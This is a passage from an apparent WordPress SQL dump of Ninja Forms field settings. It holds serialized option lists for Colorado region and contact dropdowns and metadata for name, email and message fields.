dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"6\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:7;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"7\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}','options','a:8:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:16:\"Please Selectone\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"3\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"4\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:5;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"6\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:7;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"7\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}'),(8620,155,'field_label','First Name','field_label','First Name'),(8621,155,'field_key','textbox_130','field_key','textbox_130'),(8622,155,'custom_name_attribute','','custom_name_attribute',''),(8623,155,'personally_identifiable','','personally_identifiable',''),(8624,155,'value','','value',''),(8625,156,'field_label','Last Name','field_label','Last Name'),(8626,156,'field_key','lastname_131','field_key','lastname_131'),(4393,147,'container_class','one-half first','container_class','one-half first'),(4394,147,'element_class','','element_class',''),(4395,147,'admin_label','','admin_label',''),(4396,147,'help_text','','help_text',''),(4397,147,'parent_id','14','parent_id','14'),(12185,379,'num_sort','0','num_sort','0'),(12186,379,'admin_label','','admin_label',''),(12183,379,'user_state','0','user_state','0'),(12184,379,'autocomplete_off','0','autocomplete_off','0'),(12182,379,'input_limit_msg','','input_limit_msg',''),(12180,379,'input_limit','','input_limit',''),(12181,379,'input_limit_type','char','input_limit_type','char'),(12147,378,'desc_text','','desc_text',''),(12148,378,'element_class','','element_class',''),(12149,378,'required','1','required','1'),(12150,378,'key','lastname_22','key','lastname_22'),(12151,378,'default','','default',''),(12152,378,'container_class','one-half','container_class','one-half'),(12153,378,'parent_id','8','parent_id','8'),(12154,378,'idAttribute','id','idAttribute','id'),(12155,379,'objectType','Field','objectType','Field'),(12156,379,'objectDomain','fields','objectDomain','fields'),(12157,379,'editActive','','editActive',''),(12158,379,'order','3','order','3'),(12159,379,'type','email','type','email'),(12160,379,'def_id','14','def_id','14'),(12161,379,'label','Email','label','Email'),(12162,379,'label_pos','above','label_pos','above'),(12163,379,'mask','','mask',''),(12164,379,'datepicker','0','datepicker','0'),(4421,150,'objectType','Field','objectType','Field'),(4422,150,'objectDomain','fields','objectDomain','fields'),(4423,150,'editActive','','editActive',''),(4424,150,'order','7','order','7'),(4425,150,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(4426,150,'type','listselect','type','listselect'),(4427,150,'key','select_the_person_you_would_like_to_contact_1613166502762','key','select_the_person_you_would_like_to_contact_1613166502762'),(4428,150,'label_pos','above','label_pos','above'),(4429,150,'required','1','required','1'),(4430,150,'options','a:2:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Initiator-Barbara Schneider\";s:5:\"value\";s:27:\"Initiator-Barbara Schneider\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}','options','a:2:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Initiator-Barbara Schneider\";s:5:\"value\";s:27:\"Initiator-Barbara Schneider\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}'),(8618,154,'field_label','Text','field_label','Text'),(8619,154,'field_key','html_129','field_key','html_129'),(4431,150,'container_class','one-half','container_class','one-half'),(4432,150,'element_class','','element_class',''),(4433,150,'admin_label','','admin_label',''),(4434,150,'help_text','','help_text',''),(4435,150,'drawerDisabled','','drawerDisabled',''),(4436,150,'parent_id','14','parent_id','14'),(4437,151,'objectType','Field','objectType','Field'),(4438,151,'objectDomain','fields','objectDomain','fields'),(4439,151,'editActive','','editActive',''),(4440,151,'order','8','order','8'),(4441,151,'label','Enter Your Message Here','label','Enter Your Message 